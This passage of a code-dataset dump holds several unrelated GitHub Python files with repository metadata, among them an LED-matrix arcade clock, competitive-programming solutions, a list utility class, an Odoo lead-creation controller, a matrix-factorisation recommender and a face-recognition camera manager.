digits.\"\"\"\n # Making the mouth eat digits is pretty brute force...\n # position of sprite center is compared against mouth center.\n # if +/- 'dist' pixels, consider that sprite \"eaten\" (set its\n # brightness to 0). This is not foolproof...if the frame rate\n # is super chunky (e.g. Pi Zero under heavy load), it's\n # possible (though I don't know how probable) that some\n # digits may be skipped. This would be visually annoying but\n # is not actually destructive.\n x_pos += offset\n y_pos += offset\n dist *= dist # Pixel distance squared (avoids a sqrt())\n for sprite in self.sprite_list[1:17]:\n idx = sprite.image_index\n delta_x = x_pos - (sprite.x_pos +\n self.sprite_coords_list[idx][2] // 2)\n delta_y = y_pos - (sprite.y_pos +\n self.sprite_coords_list[idx][3] // 2)\n if delta_x * delta_x + delta_y * delta_y <= dist:\n sprite.off_time = self.current_time\n sprite.brightness = 0.0\n else:\n sprite.brightness = min(\n 1.0, max(0.0, self.current_time - sprite.off_time - 1.0))\n\n def load_sprites(self, large):\n \"\"\"Load sprite sheet and extract sprite rasters from it.\"\"\"\n if large:\n filename = 'graphics/arcade-bitmasks-large.png'\n self.sprite_coords_list = SPRITE_COORDS_LARGE\n else:\n filename = 'graphics/arcade-bitmasks.png'\n self.sprite_coords_list = SPRITE_COORDS\n\n # Load sprite sheet and extract individual sprite rasters from it\n sprite_graphics = Image.open(filename)\n self.sprite_data = []\n for coords in self.sprite_coords_list:\n self.sprite_data.append(\n sprite_graphics.crop((coords[0], coords[1], # X0, Y0\n coords[0] + coords[2], # X1\n coords[1] + coords[3]))) # Y1\n\n # Sprite objects in back-to-front render order. For each Sprite,\n # first element is an index to a sprite image (in sprite_data[]\n # array) -- many of these are assigned 0 to start, which is then\n # overridden in the logic loop. Second and third elements are X & Y\n # position on matrix (again many are initialized to 0 and changed\n # later), last element is sprite color (also sometimes initialized\n # 0 and changed later).\n # This is a bit messy because the list has to be build in \"stacking\n # order\" -- as sprites will be rendered back-to-front.\n self.sprite_list = [\n Sprite(len(self.sprite_coords_list) - 1, 0, 0,\n (33, 33, 255)) # Maze\n ]\n if large:\n self.sprite_list += [\n Sprite(0, 5, 2, (255, 183, 174)), # H\n Sprite(0, 13, 2, (255, 183, 174)), # H\n Sprite(10, 21, 5, (255, 183, 174)), # :\n Sprite(0, 24, 2, (255, 183, 174)), # M\n Sprite(0, 32, 2, (255, 183, 174)), # M\n Sprite(10, 40, 5, (255, 183, 174)), # :\n Sprite(0, 43, 2, (255, 183, 174)), # S\n Sprite(0, 51, 2, (255, 183, 174)), # S\n\n Sprite(0, 5, 19, (255, 183, 174)), # M\n Sprite(0, 13, 19, (255, 183, 174)), # M\n Sprite(11, 21, 23, (255, 183, 174)), # -\n Sprite(0, 24, 19, (255, 183, 174)), # D\n Sprite(0, 32, 19, (255, 183, 174)), # D\n Sprite(11, 40, 23, (255, 183, 174)), # -\n Sprite(0, 43, 19, (255, 183, 174)), # Y\n Sprite(0, 51, 19, (255, 183, 174))] # Y\n else:\n self.sprite_list += [\n Sprite(0, 2, 1, (255, 183, 174)), # H\n Sprite(0, 6, 1, (255, 183, 174)), # H\n Sprite(10, 10, 2, (255, 183, 174)), # :\n Sprite(0, 12, 1, (255, 183, 174)), # M\n Sprite(0, 16, 1, (255, 183, 174)), # M\n Sprite(10, 20, 2, (255, 183, 174)), # :\n Sprite(0, 22, 1, (255, 183, 174)), # S\n Sprite(0, 26, 1, (255, 183, 174)), # S\n Sprite(0, 2, 10, (255, 183, 174)), # M\n Sprite(0, 6, 10, (255, 183, 174)), # M\n Sprite(11, 10, 12, (255, 183, 174)), # -\n Sprite(0, 12, 10, (255, 183, 174)), # D\n Sprite(0, 16, 10, (255, 183, 174)), # D\n Sprite(11, 20, 12, (255, 183, 174)), # -\n Sprite(0, 22, 10, (255, 183, 174)), # Y\n Sprite(0, 26, 10, (255, 183, 174))] # Y\n self.sprite_list += [\n Sprite(0, 0, 0, (0, 0, 0)), # Mouth outline\n Sprite(0, 0, 0, (0, 0, 0)), # Ghost outline\n Sprite(0, 0, 0, (255, 255, 0)), # Mouth\n Sprite(0, 0, 0, (255, 0, 0)), # Ghost\n Sprite(64, 0, 0, (222, 222, 255))] # Eyes\n if large:\n self.sprite_list += [Sprite(65, 0, 0, (0, 0, 222))] # Pupils\n\n\n def run(self):\n\n # Create offscreen buffer for graphics\n double_buffer = self.matrix.CreateFrameCanvas()\n\n # Create PIL image and drawing context\n self.image = Image.new(\"RGB\", (self.matrix.width, self.matrix.height))\n self.draw = ImageDraw.Draw(self.image)\n\n self.load_sprites(self.matrix.width > 32)\n\n while True:\n\n self.current_time = time.time()\n\n localtime = time.localtime(self.current_time)\n if TWELVE_HOUR:\n hour = localtime.tm_hour % 12\n if hour == 0:\n hour = 12\n else:\n hour = localtime.tm_hour\n\n # Configure time sprites (HH:MM:SS)\n self.set_two_digits(1, hour)\n self.set_two_digits(4, localtime.tm_min)\n self.set_two_digits(7, localtime.tm_sec)\n\n # Configure date sprites (MM.DD.YY) or (YY:MM:DD)\n if EURO_DATE:\n self.set_two_digits(9, localtime.tm_year % 100)\n self.set_two_digits(12, localtime.tm_mon)\n self.set_two_digits(15, localtime.tm_mday)\n else:\n self.set_two_digits(9, localtime.tm_mon)\n self.set_two_digits(12, localtime.tm_mday)\n self.set_two_digits(15, localtime.tm_year % 100)\n\n # Animate mouth around maze\n if self.matrix.width > 32:\n frac, x_pos, y_pos = self.draw_mouth_large()\n self.eat_digits(x_pos, y_pos, 6, 2)\n self.draw_ghost_large(frac)\n else:\n frac, x_pos, y_pos = self.draw_mouth_small()\n self.eat_digits(x_pos, y_pos, 3, 2)\n self.draw_ghost_small(frac)\n\n # Clear image, draw sprites in back-to-front order:\n self.draw.rectangle((0, 0, self.matrix.width, self.matrix.height),\n fill=0)\n for sprite in self.sprite_list:\n self.image.paste(\n sprite.adjusted_brightness(),\n (sprite.x_pos, sprite.y_pos,\n sprite.x_pos + self.sprite_coords_list[\n sprite.image_index][2],\n sprite.y_pos + self.sprite_coords_list[\n sprite.image_index][3]),\n mask=self.sprite_data[sprite.image_index])\n\n # Copy PIL image to matrix buffer, swap buffers each frame\n double_buffer.SetImage(self.image)\n double_buffer = self.matrix.SwapOnVSync(double_buffer)\n\nif __name__ == \"__main__\":\n MY_APP = ArcadeClock() # Instantiate class, calls __init__() above\n MY_APP.process() # SpectroBase startup, calls run() above\n","repo_name":"adafruit/Adafruit_Spectro_Pi","sub_path":"arcade_clock.py","file_name":"arcade_clock.py","file_ext":"py","file_size_in_byte":17879,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"15141648669","text":"from collections import defaultdict\r\ndef inpl(): return list(map(int,input().split()))\r\n\r\nclass Counter:\r\n def __init__(self, start=0):\r\n self.index = start-1\r\n\r\n def __call__(self):\r\n self.index += 1\r\n return self.index\r\n\r\nui = defaultdict(Counter())\r\nxylist = []\r\n\r\nH, W, N = inpl()\r\nfor i in range(N):\r\n X, Y = inpl()\r\n n = ui[X]\r\n if n < len(xylist):\r\n xylist[n][1] = min(xylist[n][1],Y)\r\n else:\r\n xylist.append([X,Y])\r\n\r\nxylist.sort(key=lambda x: x[0])\r\nxylist.append([H+1,1])\r\n\r\nXprev = Yprev = 1\r\nfor X, Y in xylist:\r\n Ybound = Yprev + X - Xprev \r\n if Y < Ybound:\r\n ans = X - 1\r\n break\r\n elif Y == Ybound:\r\n Xprev, Yprev = X, Ybound - 1\r\n else:\r\n Xprev, Yprev = X, Ybound\r\n\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc029/D/4561604.py","file_name":"4561604.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"41146478720","text":"from BasicLibrary import ObjectHelper\n\n\nclass ListHelper:\n \"\"\"\n\n \"\"\"\n\n @staticmethod\n def get(list_data, index, default_value=None):\n \"\"\"\n 安装索引,安全地从数组中获取元素\n :param default_value:\n :param list_data:\n :param index:元素的索引号\n :return:返回索引指定的元素;如果指定的索引号在数组内不存在,返回 None。\n \"\"\"\n if ObjectHelper.is_empty(list_data):\n return default_value\n else:\n list_length = ObjectHelper.get_length(list_data)\n if list_length == 0:\n return default_value\n else:\n if index >= list_length:\n return default_value\n else:\n return list_data[index]\n\n @staticmethod\n def get_index(list_data, value, item_property=None):\n \"\"\"\n 获取某个元素在list中的index\n :param list_data:\n :param value:\n :param item_property:\n :return:\n \"\"\"\n if type(list_data) is not enumerate:\n list_data = enumerate(list_data)\n\n for index, item in list_data:\n if item_property:\n comparing_data = item[item_property]\n else:\n comparing_data = item\n\n if comparing_data == value:\n return index\n\n return None\n\n @staticmethod\n def remove_duplication_item(data):\n \"\"\"\n 为list去除重复项\n :param data:\n :return:\n \"\"\"\n return list(set(data))\n\n # 以下获取交集并集差集的算法,只支持元素为简单类型的list\n @staticmethod\n def get_union(list_a, list_b):\n \"\"\"\n 获取并集\n :param list_a:\n :param list_b:\n :return:\n \"\"\"\n return list(set(list_a).union(set(list_b)))\n\n @staticmethod\n def get_intersection(list_a, list_b):\n \"\"\"\n 获取交集\n :param list_a:\n :param list_b:\n :return:\n \"\"\"\n return list(set(list_a).intersection(set(list_b)))\n\n @staticmethod\n def get_difference_only_in_left(list_left, list_right):\n \"\"\"\n 获取单向差集(在左侧中有的元素,在右侧中没有的元素)\n :param list_left:\n :param list_right:\n :return:\n \"\"\"\n return list(set(list_left).difference(set(list_right)))\n\n @staticmethod\n def get_difference_only_in_right(list_left, list_right):\n \"\"\"\n 获取单向差集(在左侧中没有的元素,在右侧中有的元素)\n :param list_left:\n :param list_right:\n :return:\n \"\"\"\n return list(set(list_right).difference(set(list_left)))\n\n @staticmethod\n def get_difference_all(list_left, list_right):\n \"\"\"\n 获取双向差集(在左侧中有,右侧中没有;以及在右侧中有,左侧中没有 的所有数据的集合)\n :param list_left:\n :param list_right:\n :return:\n \"\"\"\n return list(set(list_left) ^ set(list_right))\n\n @staticmethod\n def sort(list_data, callback_in__list__item_out__item_property=None, reverse=False):\n \"\"\"\n 对数组内的元素进行排序\n :param reverse:\n :param list_data:\n :param callback_in__list__item_out__item_property: 排序规则的回调函数\n 入参为:数组的元素\n 返回值为:数组元素的某个属性名称字符串\n :return:\n :example:\n actual = ListHelper.sort(cars, lambda item: item[\"year\"])\n expected = [{'car': 'Audi', 'year': 2010},\n {'car': 'Volvo', 'year': 2013},\n {'car': 'BMW', 'year': 2019},\n {'car': 'Porsche', 'year': 2023}]\n assert actual == expected\n \"\"\"\n if callback_in__list__item_out__item_property:\n list_data.sort(key=callback_in__list__item_out__item_property, reverse=reverse)\n else:\n list_data.sort(reverse=reverse)\n\n return list_data\n\n @staticmethod\n def merge(*args):\n \"\"\"\n 合并两个 list\n :param list args:\n :return:\n \"\"\"\n result = []\n for key in args:\n result += key\n\n return result\n\n @staticmethod\n def reverse(list_data):\n \"\"\"\n 返回翻转顺序的 list(翻转的list,不影响原来输入的list)\n :param list_data:\n :return:\n \"\"\"\n return list(reversed(list_data))\n\n pass\n","repo_name":"notinmood/BasicLibrary.PY","sub_path":"BasicLibrary/data/listHelper.py","file_name":"listHelper.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15156325309","text":"# coding:utf-8\r\n\r\nimport sys\r\nfrom operator import itemgetter\r\n\r\n\r\nINF = float('inf')\r\nMOD = 10 ** 9 + 7\r\n\r\n\r\ndef LI(): return [int(x) for x in sys.stdin.readline().split()]\r\n\r\n\r\nclass SegmentTree:\r\n __slots__ = ['node', 'size']\r\n\r\n def __init__(self, n_):\r\n self.size = 2 ** n_.bit_length()\r\n self.node = [INF] * (2 * self.size)\r\n\r\n # k?????a???\r\n def update(self, k, a):\r\n k += self.size - 1\r\n self.node[k] = a\r\n # ???????\r\n while k >= 0:\r\n k = (k - 1) // 2\r\n self.node[k] = min(self.node[k * 2 + 1], self.node[k * 2 + 2])\r\n\r\n # [a, b)????????\r\n def query(self, a, b):\r\n l, r = a + self.size, b + self.size\r\n res = INF\r\n while l < r:\r\n if r & 1:\r\n r -= 1\r\n res = min(res, self.node[r - 1])\r\n\r\n if l & 1:\r\n res = min(res, self.node[l - 1])\r\n l += 1\r\n\r\n l >>= 1\r\n r >>= 1\r\n return res\r\n\r\n\r\nn, L = LI()\r\nsgt = SegmentTree(L + 1)\r\nQ = [tuple(LI()) for _ in range(n)]\r\nQ.sort()\r\n\r\ndp = [INF] * (L + 1)\r\ndp[0] = 0\r\nsgt.update(0, 0)\r\nfor i in range(n):\r\n l, r, c = Q[i]\r\n cost = sgt.query(l, r) + c\r\n if cost < dp[r]:\r\n dp[r] = cost\r\n sgt.update(r, cost)\r\n\r\nprint(dp[-1])","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc026/C/4342532.py","file_name":"4342532.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"30257571231","text":"from odoo import http\nfrom odoo.http import request\n\n\nclass AddNewLeadController(http.Controller):\n\n @http.route('/add_new_lead', type='http', auth=\"public\", methods=['POST'], website=True, csrf=False)\n def add_new_lead(self, **post):\n client_name = post.get('client_name')\n client_email = post.get('client_email')\n client_phone = post.get('client_phone')\n subject = post.get('subject')\n\n # Create new lead record\n lead = request.env['crm.lead']\n lead_data = {\n 'name': client_name,\n 'email_from': client_email,\n 'phone': client_phone,\n 'description': subject,\n }\n new_lead = lead.create(lead_data)\n\n return \"Lead Created Successfully\"\n\n","repo_name":"igruk/open_academy","sub_path":"controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7918124513","text":"from recsyslib.als.alsmixin import ALSMixin\nimport tensorflow as tf\n\n\nclass BVD(ALSMixin):\n def __init__(\n self,\n num_users,\n num_items,\n num_rowclusters,\n num_columnclusters,\n name=\"bvd\",\n **kwargs\n ):\n \"\"\"Implimentation of:\n Long, B. Zhang, Z., Yu, P. 2005. Co-clustering by block value decomposition.\n KDD '05: Pages 635–640 https://doi.org/10.1145/1081870.1081949\n\n This implimentation uses tensorflow for faster compiled math operations, not optimization.\n These are multiplicative updates as in the original paper.\n\n Args:\n num_users (int): number of users\n num_items (int): number of items\n name (str): date/model name\n \"\"\"\n\n self.name = name\n self.latent_dim2 = num_columnclusters\n super().__init__(\n num_users, num_items, latent_dim=num_rowclusters, **kwargs\n )\n self.R = tf.Variable(\n tf.random.uniform(\n minval=0.001,\n maxval=1.0,\n shape=(self.num_users, self.latent_dim2),\n ),\n trainable=False,\n name=\"R\",\n )\n self.B = tf.Variable(\n tf.random.uniform(\n minval=0.001,\n maxval=1.0,\n shape=(self.latent_dim2, self.latent_dim),\n ),\n trainable=False,\n name=\"B\",\n )\n self.C = tf.Variable(\n tf.random.uniform(\n minval=0.001,\n maxval=1.0,\n shape=(self.latent_dim, self.num_items),\n ),\n trainable=False,\n name=\"C\",\n )\n\n def interact_to_confidence(self, y):\n return y\n\n @property\n def item_embeddings(self):\n return self.C.numpy().T\n\n @property\n def user_embeddings(self):\n return self.R.numpy()\n\n def update_R(self, Z, C, B, R):\n return (\n R\n * (\n tf.sparse.sparse_dense_matmul(Z, tf.transpose(C))\n @ tf.transpose(B)\n )\n / (R @ B @ C @ tf.transpose(C) @ tf.transpose(B))\n )\n\n def update_B(self, Z, C, B, R):\n return (\n B\n * (tf.transpose(R) @ tf.sparse.to_dense(Z) @ tf.transpose(C))\n / (tf.transpose(R) @ R @ B @ C @ tf.transpose(C))\n )\n\n def update_C(self, Z, C, B, R):\n return (\n C\n * (tf.transpose(B) @ tf.transpose(R) @ tf.sparse.to_dense(Z))\n / (tf.transpose(B) @ tf.transpose(R) @ R @ B @ C)\n )\n\n @tf.function\n def call(self, inputs):\n Z = inputs\n self.R.assign(self.update_R(Z, self.C, self.B, self.R))\n self.B.assign(self.update_B(Z, self.C, self.B, self.R))\n self.C.assign(self.update_C(Z, self.C, self.B, self.R))\n\n @tf.function\n def mse(self, Z):\n # eq (1)\n return tf.reduce_mean(\n tf.pow(tf.sparse.to_dense(Z) - self.R @ self.B @ self.C, 2)\n )\n","repo_name":"TimSchmeier/recsys-lib","sub_path":"recsyslib/als/bvd.py","file_name":"bvd.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32879863747","text":"# The file is opened, read and closed\nhandle= open(\"quotes.txt\", \"r\")\nfile_read=handle.read()\nprint('This is the open/close method \\n',file_read)\nhandle.close()\n\n# The file is closed automatically by using with statement\nwith open(\"quotes.txt\", \"r\") as handle:\n file_read=handle.read()\n print('This is the with option \\n',file_read)\n\n# For loop is used to read the file\nwith open(\"quotes.txt\", \"r\") as handle:\n print(\"File is read using a for loop line by line\")\n for line in handle:\n print (line.strip())\n","repo_name":"ahmetnuriozcelik/python","sub_path":"read-txt-files.py","file_name":"read-txt-files.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31656411398","text":"import pdb\n\nimport xarray as xr\nimport logging\n\n\ndef compute_xs_from_l1b(_file, burst_type='intra', time_separation='2tau'):\n \"\"\"\n\n Args:\n _file\n (str) full path L1B nc file\n burst_type\n (str) intra or inter\n time_separation\n (str) 2tau or 1tau...\n\n Returns:\n\n \"\"\"\n # Reading the l1b file\n # Loading the specified burst group\n # dt = datatree.open_datatree(_file)\n # Version 1.4\n # ds = xr.open_dataset(_file,group=burst_type+'burst_xspectra')\n # Version 1.4a\n if 'wv' in _file:\n ds = xr.open_dataset(_file, group=burst_type)\n else:\n ds = xr.open_dataset(_file, group=burst_type + 'burst')\n\n # ds = dt[burst_type+'burst_xspectra'].to_dataset()\n # drop variables\n\n logging.debug('time_separation : %s', time_separation)\n if burst_type == 'intra':\n consolidated_list = []\n list_to_drop = ['var_xspectra_0tau', 'var_xspectra_1tau', 'var_xspectra_2tau']\n for toto in range(0, 2):\n if int(time_separation[0]) != toto:\n list_to_drop.append('xspectra_' + str(toto) + 'tau' + '_Re')\n list_to_drop.append('xspectra_' + str(toto) + 'tau' + '_Im')\n for vv in list_to_drop:\n if vv not in ds:\n logging.warning('%s not present in the dataset %s', vv, burst_type)\n else:\n consolidated_list.append(vv)\n ds = ds.drop_vars(consolidated_list)\n else: # inter burst case\n pass # no variable to remove in interburst\n\n if burst_type == 'intra' or burst_type == '':\n if 'xspectra_' + time_separation + '_Re' not in ds or 'xspectra_' + time_separation + '_Im' not in ds:\n xsRe = None\n xsIm = None\n else:\n xsRe = ds['xspectra_' + time_separation + '_Re'] # +1j*ds_intra['xspectra_1tau_Im']).mean(dim=['1tau'])\n xsIm = ds['xspectra_' + time_separation + '_Im']\n if time_separation == '2tau':\n xsRe = xsRe.squeeze('2tau')\n xsIm = xsIm.squeeze('2tau')\n if time_separation == '1tau':\n xsRe = xsRe.mean(dim=['1tau'])\n xsIm = xsIm.mean(dim=['1tau'])\n\n elif burst_type == 'inter':\n if 'xspectra_Re' in ds:\n xsRe = ds['xspectra_Re'] # +1j*ds_inter['xspectra_Im']\n xsIm = ds['xspectra_Im']\n else:\n logging.warning('xspectra_Re absent from interburst group')\n xsRe = None\n xsIm = None\n else: # WV case\n raise Exception('not handle case')\n if xsRe is None:\n xs = None\n else:\n xs = xsRe + 1j * xsIm\n # Remove unique dimensions\n # xs=xs.squeeze()\n # convert the wavenumbers variables in range and azimuth into coordinates after selection of one unique vector without any other dimsension dependency\n dims_to_average = []\n if 'tile_sample' in xs.k_rg.dims:\n dims_to_average.append('tile_sample')\n\n if 'burst' in xs.k_rg.dims:\n dims_to_average.append('burst')\n if \"tile_line\" in xs.k_rg.dims:\n dims_to_average.append('tile_line')\n xs = xs.assign_coords({'k_rg': xs.k_rg.mean(dim=dims_to_average)})\n\n # Replace the dimension name for frequencies\n xs = xs.swap_dims({'freq_sample': 'k_rg', 'freq_line': 'k_az'})\n # Bug Fix to define the wavenumber in range direction.\n xs.k_rg.attrs.update({'long_name': 'wavenumber in range direction', 'units': 'rad/m'})\n\n return xs, ds\n\n\ndef compute_xs_from_l1b_wv(_file, time_separation='2tau'):\n # Reading the l1b file\n # Loading the specified burst group\n # dt = datatree.open_datatree(_file)\n # Version 1.4\n # ds = xr.open_dataset(_file,group=burst_type+'burst_xspectra')\n # Version 1.4a\n ds = xr.open_dataset(_file, group='')\n\n # ds = dt[burst_type+'burst_xspectra'].to_dataset()\n\n xsRe = ds['xspectra_' + time_separation + '_Re'] # +1j*ds_intra['xspectra_1tau_Im']).mean(dim=['1tau'])\n xsIm = ds['xspectra_' + time_separation + '_Im']\n if time_separation == '2tau':\n xsRe = xsRe.squeeze('2tau')\n xsIm = xsIm.squeeze('2tau')\n if time_separation == '1tau':\n xsRe = xsRe.mean(dim=['1tau'])\n xsIm = xsIm.mean(dim=['1tau'])\n\n xs = xsRe + 1j * xsIm\n\n # Remove unique dimensions\n # xs=xs.squeeze()\n # convert the wavenumbers variables in range and azimuth into coordinates after selection of one unique vector without any other dimsension dependency\n # xs = xs.assign_coords({'k_rg': xs.k_rg})\n # Replace the dimnesion name for frequencies\n xs = xs.swap_dims({'freq_sample': 'k_rg', 'freq_line': 'k_az'})\n # Bug Fix to define the wavenumber in range direction.\n xs.k_rg.attrs.update({'long_name': 'wavenumber in range direction', 'units': 'rad/m'})\n\n return xs, ds\n","repo_name":"umr-lops/utils_xsarslc_l1b","sub_path":"slcl1butils/compute/compute_from_l1b.py","file_name":"compute_from_l1b.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"5850482814","text":"def most_frequent(a):\r\n d={}\r\n import operator\r\n for i in a :\r\n count=a.count(i)\r\n d.update({i:count})\r\n sort=sorted(d.items(),reverse=True,key=operator.itemgetter(1))\r\n for i in sort:\r\n print(i)\r\n\r\na=input(\"enter a string:\")\r\n(most_frequent(a))\r\n","repo_name":"Thejeswini2601/Mycaptain_Python_Assignment","sub_path":"most frequent.py","file_name":"most frequent.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4015937876","text":"import json\n#from web3.auto.infura import w3\nfrom web3 import Web3, HTTPProvider, IPCProvider, WebsocketProvider\n\nnode_url = \"http://127.0.0.1:7545\"\n\nweb3_instance = Web3(HTTPProvider(node_url))\n\nprint(\"Connection: \",web3_instance.isConnected())\n\nsmartContractAddress = input(\"Smart Contract Address: \")\naddress = web3_instance.toChecksumAddress(smartContractAddress)\nabi = [\n {\n \"inputs\": [],\n \"payable\": False,\n \"stateMutability\": \"nonpayable\",\n \"type\": \"constructor\"\n },\n {\n \"constant\": False,\n \"inputs\": [\n {\n \"internalType\": \"string\",\n \"name\": \"temperature\",\n \"type\": \"string\"\n },\n {\n \"internalType\": \"string\",\n \"name\": \"pressure\",\n \"type\": \"string\"\n },\n {\n \"internalType\": \"string\",\n \"name\": \"humidity\",\n \"type\": \"string\"\n },\n {\n \"internalType\": \"string\",\n \"name\": \"dataTime\",\n \"type\": \"string\"\n }\n ],\n \"name\": \"mineData\",\n \"outputs\": [],\n \"payable\": False,\n \"stateMutability\": \"nonpayable\",\n \"type\": \"function\"\n },\n {\n \"constant\": True,\n \"inputs\": [],\n \"name\": \"numOfTuples\",\n \"outputs\": [\n {\n \"internalType\": \"uint256\",\n \"name\": \"\",\n \"type\": \"uint256\"\n }\n ],\n \"payable\": False,\n \"stateMutability\": \"view\",\n \"type\": \"function\"\n },\n {\n \"constant\": True,\n \"inputs\": [],\n \"name\": \"owner\",\n \"outputs\": [\n {\n \"internalType\": \"address\",\n \"name\": \"\",\n \"type\": \"address\"\n }\n ],\n \"payable\": False,\n \"stateMutability\": \"view\",\n \"type\": \"function\"\n },\n {\n \"constant\": True,\n \"inputs\": [\n {\n \"internalType\": \"uint256\",\n \"name\": \"\",\n \"type\": \"uint256\"\n }\n ],\n \"name\": \"sensorData\",\n \"outputs\": [\n {\n \"internalType\": \"address\",\n \"name\": \"dataSender\",\n \"type\": \"address\"\n },\n {\n \"internalType\": \"string\",\n \"name\": \"temp\",\n \"type\": \"string\"\n },\n {\n \"internalType\": \"string\",\n \"name\": \"press\",\n \"type\": \"string\"\n },\n {\n \"internalType\": \"string\",\n \"name\": \"humid\",\n \"type\": \"string\"\n },\n {\n \"internalType\": \"string\",\n \"name\": \"time\",\n \"type\": \"string\"\n }\n ],\n \"payable\": False,\n \"stateMutability\": \"view\",\n \"type\": \"function\"\n }\n ]\n \ncontract = web3_instance.eth.contract(address = address, abi = abi)\n#print(contract.all_functions())\n\nprint(\"Num of Tuples: \", contract.functions.numOfTuples().call())\n\nprint(\"\\nData Tuples: \")\n\nfor i in range(int(contract.functions.numOfTuples().call())):\n print(contract.functions.sensorData(i).call())","repo_name":"khareshivang1617/BTP","sub_path":"ForRasPi/fetchData.py","file_name":"fetchData.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23988534296","text":"import os,sys\nsys.path.append(os.path.abspath(__file__))\n\nfrom datetime import datetime, timedelta\n\nimport cv2\nimport face_recognition\n\n\nclass CameraManager(object):\n def __init__(self, controller):\n self.controller = controller\n self.cap = cv2.VideoCapture(0)\n self.num_frame_to_process = 4\n if not self.cap.isOpened():\n print('Could not find the camera {}'.format(0))\n exit()\n\n self.unknown_id = 1\n self.names, self.face_encodings = self.load_face_encodings()\n self.confidence_threshold_frames = 5 # The number of frames in which the same vector for face is seen.\n self.confidence_threshold_faces = 0.01 # The distance between faces recognized by system.\n self.last_notification_time = {}\n\n def load_face_encodings(self):\n return [], []\n\n def process_face_encoding(self, face_encoding, frame, face_location):\n matches = face_recognition.compare_faces(self.face_encodings, face_encoding)\n if True in matches:\n first_match_index = matches.index(True)\n name = self.names[first_match_index]\n if name.startswith('unknown'):\n confidence = float(name[name.index('_') + 1:])\n confidence += 0.2\n if confidence > 0.9:\n current_time = datetime.now()\n # if first_match_index in self.last_notification_time:\n # last_notification_time = self.last_notification_time[first_match_index]\n # if current_time - last_notification_time < timedelta(minutes=1):\n # self.last_notification_time[first_match_index] = current_time\n # return\n\n # self.last_notification_time[first_match_index] = current_time\n top, right, bottom, left = face_location\n face_image = frame[top:bottom, left:right, :]\n\n self.controller.push(\n {\n 'type': 'camera',\n 'event': 'face_seen',\n 'face_image': face_image,\n 'face_location': face_location,\n 'face_encoding': face_encoding,\n 'time': current_time\n }\n )\n else:\n self.names[first_match_index] = f'unknown_{confidence}'\n # else:\n # print(f'Greetings {name}!! How is it going')\n else:\n self.names.append('unknown_0.0')\n self.face_encodings.append(face_encoding)\n\n def run(self):\n counter = 0\n\n while True:\n counter += 1\n ret, frame = self.cap.read()\n if counter == self.num_frame_to_process:\n counter = 0\n # Capture frame-by-frame\n # small_frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n small_frame = frame\n rgb_small_frame = small_frame[:, :, ::-1]\n\n face_locations = face_recognition.face_locations(rgb_small_frame)\n # print(face_locations)\n frame_face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n for i, face_encoding in enumerate(frame_face_encodings):\n self.process_face_encoding(face_encoding, frame, face_locations[i])\n\n # Display the results\n for top, right, bottom, left in face_locations:\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n # top *= 2\n # right *= 2\n # bottom *= 2\n # left *= 2\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # When everything done, release the capture\n self.cap.release()\n cv2.destroyAllWindows()\n","repo_name":"sharare90/ARVR-LabAgent-Controller","sub_path":"cameramanager/camera_manager.py","file_name":"camera_manager.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2240050993","text":"# BOJ 4948 베르트랑 공준\n# https://www.acmicpc.net/problem/4948\n\nimport math\n\ndef isPrime(num):\n if num == 1: return False\n for i in range(2, int(math.sqrt(num))+1):\n if num % i == 0: return False\n return True\n\nli = list(range(2,246912)) # 미리 123456의 2배인 246912\nprime_li = []\nfor i in li:\n if isPrime(i): # 그 사이의 소수를 구해 prime_li를 만들어 둠\n prime_li.append(i)\n\nwhile(1):\n answer = 0\n n = int(input())\n if n == 0: break # 입력이 0 이면 끝\n\n for i in prime_li: # 미리 만들어 둔 prime_li에서\n if n < i <= n*2: # 범위 사이에 i가 있다면 \n answer += 1 # 개수 1개 증가\n \n print(answer)","repo_name":"yurileeeee/Algorithm","sub_path":"BOJ/9_math2/4948.py","file_name":"4948.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18928617213","text":"h = []\nfor i in range(9):\n h.append(int(input()))\nsave=[0]*2\nsum_h = sum(h)\nfor a in range(len(h)):\n for b in range(a+1,len(h)):\n if sum_h-(h[a]+h[b])==100:\n save[0]=h[a]\n save[1]=h[b]\nh.remove(save[0])\nh.remove(save[1])\n\nh.sort()\nfor i in h:\n print(i)\n","repo_name":"choisony/Baekjoon","sub_path":"Brute Force/2309 일곱 난쟁이.py","file_name":"2309 일곱 